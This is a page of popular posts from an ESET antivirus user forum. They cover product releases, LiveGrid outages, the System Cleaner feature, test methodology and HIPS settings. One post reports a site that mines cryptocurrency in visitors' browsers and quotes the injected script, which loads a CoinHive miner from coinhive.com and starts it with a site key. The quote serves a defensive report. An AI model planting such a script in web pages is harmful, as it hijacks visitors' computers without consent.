Popular Content

Showing content with the most kudos since 10/20/2017 in all areas

  1. 5 likes
    With all the hoo-haa about v11's release, I think the 30th anniversary of NODs code development was (kind of) overlooked. So I just want to say Congratulations ESET on 30 years of protection and product development. It's easy to get lost in the day to day issues, but 30 years is an accomplishment to be proud of!
  2. 5 likes
    I've got information that LiveGrid servers should be up and running now alright.
  3. 4 likes
    Here is the latest from ESET US Support: (I am not sure if I'll receive any more updates from Support. If I do I will post them here) ____________________________________________________ Update for Case #XXXXX - "Progissue - Otherprog" An ESET Technical Support Representative has updated this case with the following information: Hello, Thanks for your reply. We needed to rule out the issue with the scan file count was not due to a corrupted product update from v10 to v11. We did some internal testing with this after your reply and was able to reproduce the issue on our test environment. In older versions of ESET that "scan to administrator" was there when scanning your computer from a standard user account. We have escalated this issues to our developers for further analysis. Thank you for using ESET security products, ESET Technical Support North America
  4. 3 likes
    I would not take this tester above seriously in any way shape or form. He is concerned with YouTube traffic and not testing correctly. First I should mention, he likes to claim the use of zero days, anyone with any experience testing will know instantly, that these samples are far from this. They are collected from Virussign in sample packs, file extension renamed, and normally he renames the files themselves. He does not vet the samples for working/broken or legitimacy nor does he vet the samples for age and detection. He does not take the time to learn the product, how it functions and works as designed. As Marcos pointed out and is quite correct, his methodology is beyond flawed.
  5. 3 likes
    You can disable it (advanced setup, update, profiles, update mode and uncheck "application update"). Eventually, you will get popups when your version is very old (you can still click No). But that's over a year away.
  6. 2 likes
    Resets back to Computer default is all I understand it to mean. But I agree/understand that it would be good to have a list of what flagged it in the first place and what will be reset.
  7. 2 likes
    I don't think Facebook can be trusted with much of anything let alone nude pictures. A permanent solution would be to keep your clothes on when pictures are being taken. Yeah I know, to simple.
  8. 2 likes
    Since I never get any response from ESET, I just should I would also post this here for an admin to make sure this site is blocked....here is a copy of the email I just sent to ESET Samples Team: Please check this site: https://www.techinferno.com/index.php?/forums/ and have ESET’s HTTP Scanner block it =========================================================================================================== Just like to warn you guys that it would seem that techinferno has now started to used end users computers to mine crypto currency. Just went on myself to check for some info and watched my CPU spike to 100% with the system lagging, even down to GPU driver crashing so i closed the tab it went back to normal, i then went and viewed the source for the index page. Here is what was found: <link rel='shortcut icon' href='****://sslcdn.techinferno.com/uploads/monthly_2017_08/favicon.ico.902cfabe37f7260915a7c8342595a33e.ico'> <script src="****://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new CoinHive.Anonymous('uWKXebL5jXICjXGj85wncylJDkRN9gVu'); miner.start(); </script> TOS Tech|Inferno is a technology website dedicated to discovering the latest breakthroughs in vbios, bios, egpu and other trends in the industry. As part of this dedication to cutting edge technology, we sometimes try new technologies as part of our codebase that can range from subtle advertising in the form of text to silent cryptocurrency mining.None of the technology we test on this website will ever adversely affect our end users as we try to keep it minimal and out of sight so that our users can maximize their enjoyment of Tech|Inferno without the typical advertisements cluttering their screens
  9. 2 likes
    -Edit- Just refer to the below screen shot as proof that Eset's URL list blocking does work. However and of course, it will not be triggered if the coin miner URL has been blocked by other means. Definitely "wild and crazy" Coin Hive mining going on! I found a way to get Eset's Web Filtering URL block list to detect the Coin Hive connection on the TechInferno web site as shown in the below screen shot. I will describe the "how" and speculate on the "why." I installed the Adblock Plus add-on for IE11. I then disabled the Fanboy Adblock TPLs; both the Easylist and the Easylist Privacy TPLs. Important - all TPLs have to be disabled or Adblock Plus won't allow for detection of this Coin Hive miner instance on the TechInfero web site. Now for the "speculation" as to why this works. Appears the connection to Coin Hive is somehow occurring through some type of redirect or "camouflaging". It also appears that Adblock Plus can "trace" this activity and resolve to the "real" https://coinhive.com/lib/coinhive.min.js address. As such, Eset's URL filtering can now detect it upon connection attempt. Bottom line - looks like Coin Hive has figured out a way to defeat host based URL filtering.
  10. 2 likes
    Does Internet Security is immune to the #AVGater? https://www.neowin.net/news/exploit-uses-antivirus-quarantine-to-release-malware
  11. 2 likes
    Yes, we've restored files under the account of the currently logged user and not under the system account. When attempting to exploit the vulnerability, you'd get an error like this from ESET's products:
  12. 2 likes
    It means the number of changes / differences from default settings in a particular branch of the setup.
  13. 2 likes
    Have only had this issue once since the thread was created, and it was confirmed by ESET themself to be an outage on their server. Funny how it affects some and not others There are lots of things that need to be considered that can cause the loss to the servers, high bandwidth consuming streaming , using bit torrent or similar file sharing apps , bad routing or load on the internet itself (causing regional issues), loss via Wi-Fi signal, Blocklisting software, poorly configured adapters, bad router settings, are just SOME starting points. Maybe if ESET has a webpage where the "LIVE" status of the LiveGrid server was displayed , with a Green / Amber/ Red light type of alert then the forums might not get flooded with messages either.
  14. 2 likes
    I really don't know what your attempting to prove. Eset Internet/Smart Security detects the exploits used in WannaCry, EternalBlue and DoublePulsar, by CVE using its IDS which is part of its Network Protection. Ditto for the recent Bad Rabbit ransomware which used the EternalRomance exploit. Since you are using NOD32 which doesn't include network protection, you are not protected against these exploits. When you disabled NOD32's realtime protection, you also disabled any heuristic scanning and corresponding sandboxing. These components are used to supplement Eset's signature detection when a process performs suspicious activities including those associated with ransomware. It is assumed that the heuristic scanner will signal the HIPS to apply pre-defined rules used to detect ransomware activity by the process. The problem here is that encryption activity per se is not malicious since Window's itself performs like activities. Therefore, Eset needs to identify "good vs. bad" encryption activities.
  15. 2 likes
    Support for the latest version of the 1Password plug-in will be added in the Banking payment and protection module 1115.
  16. 2 likes
    i just want to say thank you for not going the route so many have gone and making a really horrible and ugly gui and taking away most of the advanced options. i love the current one and im sure at some point it will need updating but when that happens i hope you guys will continue the same approach! all my favorite gui's are now gone except with eset you guys kept it fairly close.
  17. 2 likes
    Description: More information in system cleaner Detail: I have mentioned this previously. System cleaner is the new tool in version 11 that alerts you to system settings that have been changed from default the idea being that they could have been changed by malware. The issue is they give no information on the actual setting just the type of setting. I tested this feature by clicking to change settings hoping I would be shown the changes and able to make a decision. What would make more sense is having a way to see the actual changes and a way to ignore certain changes that the user wants to keep. Many people change things themselves e.g Windows tweakers and this feature could cause issues if they change things without realising. This could always be a more advanced option disabled by default. If this cannot happen at least have a lot for this feature so that advanced users can see the changes made. If eset is changing a Windows option it shouldn't be too hard to log the change somewhere. Also an undo feature might be handy as when I tried it out hoping i would be given options eset just changed them and with no lot I have no idea what got changed
  18. 2 likes
    Eset needs to create a log file for the feature and log in there what it finds. Again, quite a few folks revise OS settings from the default. Personnally if malware alerted OS settings, I would opt for a Win 10 in-place repair instead. There are also utilities like those hosted on tweaking.com that many use to reset system defaults, repair the registry, etc.. It also should be noted that if malware altered system settings, it is supposed to be the job of the AV to automatically repair those settings
  19. 2 likes
    Bad result? I don't see any bad results there but there's definitely an issue with the methodology. As for the urls, it appears to be there were no malicious ones that were not blocked by ESET but those not blocked was mainly fresh phishing from today which was not blocked at that time by any AV. As for the on-demand scan "test", I "like" tests where one puts all mess (benign files, apps with Chinese gui, PUAs, etc.) into a folder, then scans the files and presents undetected files as misses AVs that detect such files have FPs and should be penalized for that but in these "tests" they get good points for detecting FPs. A credible tester should know what he or she has in the test set, should be able to distinguish malware from PUAs, greyware and other benign applications and remove such from the test set. Including non-malicious files usually substantially skews the final results. Also note that on-demand scans do not reflect the real-world scenario. In real world, malware is usually downloaded by malicious scripts on compromised websites or spread by spammed email. Running just an on-demand scan cannot test other protection layers that might have prevented the malware from being downloaded and executed.
  20. 2 likes
    I'll be happy to clarify, although I am immediately surprised that someone like yourself should have to ask that question. Why do I want to have the ability to disable auto-installation of ANYTHING on my computers? Simple answer is in case of bad upgrades pushed out by devs that then go on to cause great damage to the user's system. Could be a minor incompatibility with another security program, or it could be a major flaw that quality control did not catch and hundreds if not thousands of users are left with hosed operating systems. Why does Microsoft allow users to decide if they want to download and install monthly updates? Why do the vast majority of all security programs provide this option to their users? Because while a large segment of non-technically inclined users are content with auto-installation of new versions, there is also a segment who want to research change logs and peruse various forums to see if other users are reporting problems with new version releases. Again, this answer is so obvious, I am surprised that you would ask for clarification, Marcos. And it is discouraging to learn from you that there is no simple setting that I can employ to disable these forced upgrades.
  21. 2 likes
    If you had been using pre-release and changed to regular update just wait until ESET do the next database update If you checked now you should see you have 16296P but after next update it will be for example 16297
  22. 2 likes
    Every year the top spot in this category of test(along with false alarm tests ) is grabbed by eset (propably its been kept reserved lol ). No wonder millions of people rely on eset. It is the lowest foot print that eset has maintained for decades, running pc's butter smooth with extremely low false positives. Keep up the good work Eset.
  23. 2 likes
    Someone asked me a question on how Eset protects against this for UEFI BIOS and what component does so. Any tech references for this would be greatly appreciated.
  24. 2 likes
    http://chart.av-comparatives.org/chart1.php?chart=chart4&year=2017&month=10&sort=1&zoom=2 ESET, the king of performance once again!
  25. 1 like
    Please uninstall ESET in safe mode using the ESET Uninstall tool as per the KB https://support.eset.com/kb2289.
  26. 1 like
    I think it could be very useful if you had an infection screw up your system files. Otherwise not so much. But that's it's purpose and I'm sure it would do it well.
  27. 1 like
    Some info about System Cleaner on the KB: https://support.eset.com/kb6564/#SystemCleaner
  28. 1 like
    I'm running ERA 6.5. The Win CLIENT has updates ready. I apply the Task to the CLIENT. ERA reports it's running and then finished successfully. There's CPU activity when ERA reports it's running but nothing happens: OS Updates are not installed. What do I have to do in order to get the feature work? Regards.
  29. 1 like
    If you change the "block" action to "ask" and enable "Notify user," you can. You will receive an alert and can then chose "Block" or "Allow." This assumes one has the "smarts" to answer the alert properly.
  30. 1 like
    No problem here: Time;Scanner;Object type;Object;Threat;Action;User;Information;Hash;First seen here 11/12/2017 8:38:30 PM;HTTP filter;file;hxxps://coinhive.com/lib/coinhive.min.js;JS/CoinMiner.F potentially unsafe application;connection terminated;DESKTOP-5JIJ6V4\Admin;Threat was detected upon access to web by the application: C:\Program Files (x86)\Mozilla Firefox\firefox.exe It's been detected for a month already.
  31. 1 like
    Changelog is always available if you go to the advanced download section for the product in question on ESET homepage. For this release Fixed: Unable to change protection state using keyboard Fixed: Unable to select Region during License Key registration Fixed: “Anti-Theft has been successfully disabled” message appears after changing the device name Fixed: Username and password data for Updater go missing after product activation Fixed: Gamer Mode does not work in Manual mode Fixed: Various localization issues Fixed: Various internal bugs
  32. 1 like
    Thank you very much, expert planet Everything is OK now, with my new bootlable media Came
  33. 1 like
    The intention of Proton is to remain hidden and provide a backdoor on your Mac to steal all sorts of personal information. The WeLiveSecurity article that @itman linked provides a wonderful amount of detail about Proton — including how to manually check if you are compromised and what the payload does on the system. https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/
  34. 1 like
    You don't have to block twitter, you got the application installed. (else it won't show up in CCleaner) So if you don't use twitter, just uninstall it.
  35. 1 like
  36. 1 like
    Welcome to the Forum, illumination. We are glad to have you aboard. I'm sure you will enjoy your stay.
  37. 1 like
    I believe the issue is with scheduling a task - the user wants to schedule a task at a specific time but also scanning with administrative privileges which doesn't seem possible.
  38. 1 like
    Any HIPS allow or deny rules would be applied w/o issue at startup time. The issue is with "ask" rules. They are time dependent. If a response is not received within a specified time interval, the HIPS uses a default allow action. Also something you may not be aware of. User created rules do not completely override Eset set internal HIPS rules. I do know for sure this applies to both the "Auto" and "Smart" HIPS modes. These rules take precedence over any user created rules. If you don't know what I am referring to, open up the Eset GUI HIPS settings. Then in the advanced section, enable "log all blocked operations." In the HIPS log what you will observe is wording along the lines of "operation partially allowed/blocked" for your user created rules. What this indicates is an internal Eset HIPS rule has taken precedence over your user created rules. Make sure you disable "log all blocked operations" after testing since your HIPS log will rapidly contain many hundreds of entries.
  39. 1 like
    Ye me too! it's more dangerous than useful(since Eset cant provide details)
  40. 1 like
    As far as I can gather it's just settings that aren't set to their standard default setting the idea being that the system cleaner could revert changes made by malware. Sadly there is no way to find out the exact setting. I clicked fix hoping it would bring up more details but it just changed the settings to default and there's no undo option or a lot to see changes. I mentioned this to eset but it seems this is the way they want it and it would be too hard to show each individual changed option. I suggested a way to show more options even if disabled by default as I could imagine people changing stuff to default they had changed themselves. I also suggested a way to ignore specific changes but it appears this won't happen
  41. 1 like
    Appears by default the HIPS will only check program startup from the drive the OS is installed on. Create a HIPS rule for each drive you want to monitor startup activity by specifying for Applications -> Specific applications -> D:\*.* etc.. I tested this and it does detect any program startup on the specified drive.
  42. 1 like
    So far 10/11 computers in my test group have no issues. I did notice that MS Edge stopped working for one domain user, but this seems to be a common issue with upgrading windows 10.
  43. 1 like
    Hi, Version 11 has been released. However, ESET only provides the Live Installer. Since I have times the support contacted. I told them that I would not use the Live Installer and prefer the full installer. They have also sent me simply the link for the Live Installer. Do you know if there is still a full installer? Greetings
  44. 1 like
    If you are getting notifications about problems connecting to LiveGrid servers, please carry on as follows: - In the advanced setup -> tools -> log files, change logging verbosity to Diagnostics - Reboot the computer - Download CloudCar - Collect logs with ELC and provide me with the generated zip archive.
  45. 1 like
    Is the CloudCar test file detected as "Suspicious object" when you are getting this notification?
  46. 1 like
    It's hard to tell because there's no security solution that would detect 100% of threats. I'd suggest enabling detection of potentially unsafe applications and running a full disk scan.
  47. 1 like
    For not having the Live Grid not accessible message when you arent connected with internet you can disable it by going to: Advanced Configuration -> User Interface -> Application Status (Edit) -> General -> Eset Live Grid not accessible (Turn it Off)
  48. 1 like
    Hello Fabbel, we are sorry for the inconvenience caused. The Gamer mode behavior is a bug and will have to be fixed on our side, when you enable the automatic Gamer mode detection as a wrkaround, it should work correctly until we fix it. When in comes to the SSL/TLS inspection, which browser do you use? Does the issue persist after system reboot? Regards, P.R.
  49. 1 like
    Forgot to close this topic. After all I decided to simply reinstall Windows 10. Afterwards I installed Eset without a problem.
  50. 1 like
    In addition to Gentoo, this problem mainly seems to affect Ubuntu systems. In any case, the solution is simple.